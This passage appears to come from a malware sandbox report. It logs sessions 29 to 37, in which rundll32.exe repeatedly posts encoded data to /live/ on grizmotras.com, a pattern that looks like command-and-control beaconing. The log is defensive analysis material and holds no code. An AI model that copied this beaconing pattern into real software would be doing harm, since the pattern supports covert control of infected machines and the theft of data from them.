2024-04-26 21:19:45 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49779	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:46 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:46 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:50 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DittiktyGBQ4T1ElBmc6Kw1ai9tdYO6UyjbL3RjfKaJA8giiDeeE5rpVtj7qydUsbSmFGN2AkNIQi4iQ%2B5YZjtA6mkDaNZsDHGh3TdWL3MK%2FHgKqBZvXJTUiv9aWCBIFSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99cebdcb84c13-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:50 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49780	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:50 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:50 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqDcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:19:57 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZRfWBpRKZvy1qQz2%2BChtDKYplGKkVaheCPMnzhLdp%2FgHMo7ypyJcSi9jrRJ148W0N5AFXyKKG0Uc3vHNjk6lYMrN%2BIi7cQyztsVsNEtpmfdqJGb4BwLWF3g4eOWjUymWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99d081b3f31fb-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:19:57 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:19:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49781	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:19:57 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:19:57 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RqDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:02 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=baO%2FX8BAC23jIYq7A%2F05n8AoUDHaoPK%2BeKdvPoEWQvyynmHj01E3qCbTvjYtb0b1AONSCr9cyWyE9wZ468zL8xxecHWvdv5qWpQZAmh6CXz4we65AvDya1RqkS6N%2BPfjaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99d32faa7a57c-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:02 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49782	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:02 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:02 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:15 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1B3bJhIkNxXbPJDqRwRTdDHKEeweL%2FcOmyljg2sSxwE15FWJ7k28ns3MWWHnUrfEAZL83a7MZDPdjOT0LloSQ6WpS3Bbr%2FgeAbZcidyaXcezNpT4MOhgvAn5fZbi7tISg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99d51bc8d9ae6-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:15 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49783	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:16 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:16 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:20 UTC	572	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wq99CaUGs%2BJNGeUwq8lqkKydgpDNYwNS9hfCcrE3vukcVQMvTpZyVWWTjHNlbjtkuajfb2N3vF8GBlLH4Mp2px4Jssrd3htzu5XvIRb414IjwItqQhTTHfkWwYoTIvSsPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99da64e63741a-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:20 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49784	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:25 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IAFzNCozW%2FFXK1HdUUL%2F9ci4Yp5dvlM3O6MMFFj4zxFhmrdEXQWfAN0ZoIhsRCH8Ja6j1EJl%2BnY7lVMFyF914oJwC%2F7poejmlF29gnyVrs3xmTmXMcVFSum8pb7GwdYixg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99dc27a9f6da1-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:25 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49785	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:25 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:25 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:30 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E03EIx4bTXRFCDyIPUL2E%2FSvzSpS7KeFiHzleZBlfLEjSmfmCdCNKdJ07WpFhqrtARZSDTUtxLrGP3L6bSmEHylkt6I4LZo6%2FuK5D7HoZDU00lPmNVhNgGqVcR7ysfpBig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99de3b84e227d-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:30 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49786	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:30 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:30 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpAcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:34 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LM85PjohwRZ7pwcT5cW8dFU%2FqsiOoj%2BTivXuB91joBC%2FYr0EsV0IYseXVFJEBBQc6XOqlk%2BY8MYW07c6z3KVZTs%2FW1vAIjH9NRYWZblNVg6llKc4wYzcX1GOHayv0QOnXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99e019a62a695-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:34 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49787	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:35 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:35 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: 